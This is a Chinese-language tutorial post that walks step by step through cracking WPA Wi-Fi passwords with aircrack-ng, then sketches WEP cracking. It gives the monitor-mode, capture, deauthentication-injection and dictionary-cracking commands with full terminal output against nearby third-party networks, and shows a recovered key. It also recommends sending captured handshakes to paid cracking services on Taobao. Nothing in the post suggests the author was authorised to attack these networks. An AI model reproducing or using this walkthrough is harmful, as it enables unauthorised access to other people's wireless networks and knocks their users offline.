虽然无线破解现在有GUI版的,很少人使用aircrack这种命令行下的无线破解工具,不过我还是觉得命令行版的比GUI操作更自由~
就教下简单的WPA破解,WEP现在很少人使用了,估计没啥作用。不过等等还是在最后说下WEP的命令吧。
先介绍下Aircrack-ng套装常用的几个工具
airmon-ng:检查wifi端口状态和进入监控模式到工具
airodump-ng:扫描网络并抓包的工具,跟aireplay-ng配合使用
aireplay-ng:数据包注入工具
aircrack-ng:数据包破解工具
0x01 ifconfig wlan0 up #激活无线网卡
0x02 airmoin-ng start wlan0 up #将无线网卡设置为Monitor模式
0x03 airodump-ng -w 保存数据包路径加文件名 -c 频道 mon0 #开始抓包,可以加个--ivs参数来设定只抓ivs的数据
在这里解释一下,一般我们破解密码只需要ivs数据包,如果不加ivs参数,它会默认保存为cap文件,cap文件包含了各种数据,会导致文件过大,有时候cap文件会大到几百M,如果你不是想分析里面的数据,单单要破解密码,推荐保存为ivs。
0x04 开启另一个bash窗口,输入aireplay-ng -0 10 -a AP的Mac -c 客户端的Mac mon0 #进行Deauth注入获取WPA的握手包
0x05 aircrack-ng -w 字典路径 ivs/cap文件路径 #开始字典跑包破解密码,当然你也可以拿到淘宝上面找人代跑、它们有强大到字典跟显卡(GPU破解)这样可以让我们的破解速度跟成功率大大提高
----------------------思路交代完毕、下面是实战----------------------
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0 up
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]/usr/local/sbin/airmon-ng: line 631: [: up: integer expression expected
(monitor mode enabled on mon0)
---------------------
CH 7 ][ Elapsed: 52 s ][ 2013-04-22 19:02
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -44 90 500 60 0 7 11e WPA2 CCMP PSK Netcore_2_4G
0E:34:CB:00:97:A2 -71 0 4 0 0 6 54e. WPA2 TKIP MGT
C8:3A:35:3B:D1:00 -73 57 317 136 9 7 11e WPA CCMP PSK Tenda_3BD100
00:25:86:32:82:0A -74 0 6 0 0 6 54 . WPA2 CCMP PSK liaojie
78:44:76:01:3C:26 -76 78 476 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 13 0 0 6 54e. WPA2 TKIP PSK
0E:34:CB:00:8B:18 -79 8 4 0 0 6 54e. WPA2 TKIP MGT
06:34:CB:00:8B:18 -79 0 7 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 0 2 0 0 6 54e. WPA2 TKIP PSK
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 22
(not associated) 00:21:6B:5C:66:7A -78 0 - 1 0 1
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 2
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 11e-11e 0 77
[2]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
root@bt:~#
BSSID是AP的Mac,STATION是客户端到Mac,只有客户端连接AP的时候才能实施抓包破解。(好像是这样...大牛如果有其他到方法请说下)
在没有注入攻击之前,Frames跟#Data的数据量很少,这时候我们就要利用客户端进行攻击了
root@bt:~# aireplay-ng -0 10 -a C8:3A:35:3B:D1:00 -c 08:10:77:1F:DA:44 mon0
19:05:04 Waiting for beacon frame (BSSID: C8:3A:35:3B:D1:00) on channel 7
19:05:05 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [23|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|52 ACKs]
19:05:06 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [34|49 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [27|46 ACKs]
19:05:07 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [28|55 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [32|49 ACKs]
19:05:08 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [33|48 ACKs]
19:05:09 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [36|52 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [40|59 ACKs]
19:05:10 Sending 64 directed DeAuth. STMAC: [08:10:77:1F:DA:44] [53|51 ACKs]
-0 后面加的是攻击次数,如果你攻击10次后没有出现WPA handshake的话,就继续攻击。
我们在另一个窗口输入攻击命令后,返回airodump-ng界面,会发现右上角出现了WPA handshake的提示
CH 7 ][ Elapsed: 4 mins ][ 2013-04-22 19:09 ][ WPA handshake: C8:3A:35:3B:D1:00
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:10:77:1F:DA:44 -43 100 2603 295 0 7 11e WPA2 CCMP PSK Netcore_2_4G
00:34:CB:00:97:A2 -68 0 8 0 0 6 54e. WPA2 TKIP PSK
C8:3A:35:3B:D1:00 -71 100 783 638 0 7 11e WPA CCMP PSK Tenda_3BD100
06:34:CB:00:97:A2 -71 0 7 0 0 6 54e. OPN CMCC
00:25:86:32:82:0A -72 0 24 0 0 6 54 . WPA2 CCMP PSK liaojie
0A:34:CB:00:82:C5 -76 0 16 0 0 6 54e. WPA2 TKIP MGT
78:44:76:01:3C:26 -75 83 2252 0 0 7 54 WPA2 CCMP PSK ipTIME
00:34:CB:00:82:C5 -76 0 47 0 0 6 54e. WPA2 TKIP PSK
06:34:CB:00:8B:18 -78 0 8 0 0 6 54e. OPN CMCC
00:34:CB:00:8B:18 -79 11 6 0 0 6 54e. WPA2 TKIP PSK
0E:34:CB:00:8B:18 -79 0 9 0 0 6 54e. WPA2 TKIP MGT
06:34:CB:00:82:C5 -75 0 14 0 0 6 54e. OPN CMCC
0E:34:CB:00:97:A2 -66 0 14 0 0 6 54e. WPA2 TKIP MGT
8C:21:0A:D1:51:B4 -76 0 1 0 0 6 54e. WPA2 CCMP PSK 1024_D151B4
00:34:CB:00:76:6A -75 0 9 0 0 6 54e. WPA2 TKIP PSK
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:90:A2:BC:DB:A6 -56 0 - 1 0 127
(not associated) 0C:37:DC:9B:2B:7C -80 0 - 1 0 12
C8:3A:35:3B:D1:00 E0:A6:70:D7:90:8E -1 11e- 0 0 36
C8:3A:35:3B:D1:00 08:10:77:1F:DA:44 -44 1e-11e 0 1672 Tenda_3BD100
8C:21:0A:D1:51:B4 70:F1:A1:1E:22:55 -80 0 - 1 0 11
[3]+ Stopped airodump-ng -w /home/test -c 7 --ivs mon0
root@bt:~#
WPA handshake 后面的Mac就是AP的Mac,AP指的是要破解的无线路由
开个窗口查看下ivs文件的大小
root@bt:~# cd /home
root@bt:/home# ls -al test-01.ivs
-rw-r--r-- 1 root root 6284 2013-04-22 18:55 test-01.ivs
6284字节,可以破解了(一般只要不是0字节,都可以破解),你可以把这个文件发给淘宝破解,也可以本地破解
root@bt:~# aircrack-ng -w /home/crack.txt /home/test-03.ivs
Opening /home/test-03.ivs
Read 33 packets.
# BSSID ESSID Encryption
1 08:10:77:1F:DA:44 Netcore_2_4G Unknown
2 78:44:76:01:3C:26 ipTIME Unknown
3 C8:3A:35:3B:D1:00 Tenda_3BD100 WPA (1 handshake)
4 0A:34:CB:00:76:6A CMCC-AUTO Unknown
5 06:34:CB:00:8B:18 CMCC Unknown
6 06:34:CB:00:76:6A CMCC Unknown
7 00:25:86:32:82:0A liaojie Unknown
8 06:34:CB:00:82:C5 CMCC Unknown
9 20:DC:E6:52:52:8E TP-LINK_ooo Unknown
10 06:34:CB:00:97:A2 CMCC Unknown
11 8C:21:0A:D1:51:B4 1024_D151B4 Unknown
Index number of target network ? 3 #你输入破解命令后,它会让你选择你要破解的序号,“Encryption”只要这个下面有WPA字样就说明这个序号下的AP已经抓到数据包,可以破解,这里我选择3
Opening /home/test-03.ivs
Reading packets, please wait...
这里说下ivs文件的文件名,在aircrack-ng中,如果你输入“test”这个名字,它会自动给你命名为“test-01.ivs”,如果实施第二次抓包,它会生成名为“test-02.ivs”,以此类推,因为我写这篇文章的时候测试了三次,所以是test-03.ivs
Aircrack-ng 1.1 r2178
[00:01:27] 72176 keys tested (814.02 k/s)
KEY FOUND! [ 0222XXXX ]
Master Key : D5 8B BC BE 46 3D 43 2D 5F 03 A9 2F 61 95 D6 DD
6C 13 ED 6F F9 A5 15 73 1C BB C2 FC 8E 34 CC DA
Transient Key : E5 55 3D E8 3F 89 4A 72 C2 BD E1 60 C7 CA DB AF
DB 08 A3 C4 C5 FC A9 B4 96 86 2D 46 A6 57 B8 A4
57 F6 09 42 94 E7 A7 FF 79 89 83 AB C2 00 13 26
F7 AA D8 60 B8 5A 0A DC 81 57 53 29 25 FD 17 A0
EAPOL HMAC : AE 6F C0 44 A3 E7 E4 32 DA 83 71 DF 48 26 32 05
root@bt:~#
破解结果,Key是0222XXXX
------------------------------------下面是WEP的破解大概过程----------------------------------------
0x01 ifconfig wlan0 up #激活无线网卡
0x02 airmon-ng start wlan0 up #将无线网卡设置为Monitor模式
0x03 airodump-ng -w 保存数据包路径 -c 频道 --ivs mon0 #开始抓包
0x04 aireplay-ng -3 -b AP的Mac -h 客户端的Mac mon0 #用ArpRequest 注入攻击
0x05 aircrack-ng ivs/cap的路径 #破解WEP,WEP不需要字典,一般数据够多的话,几分钟就能破解出来了
------------------------------------------------------------------------------------------------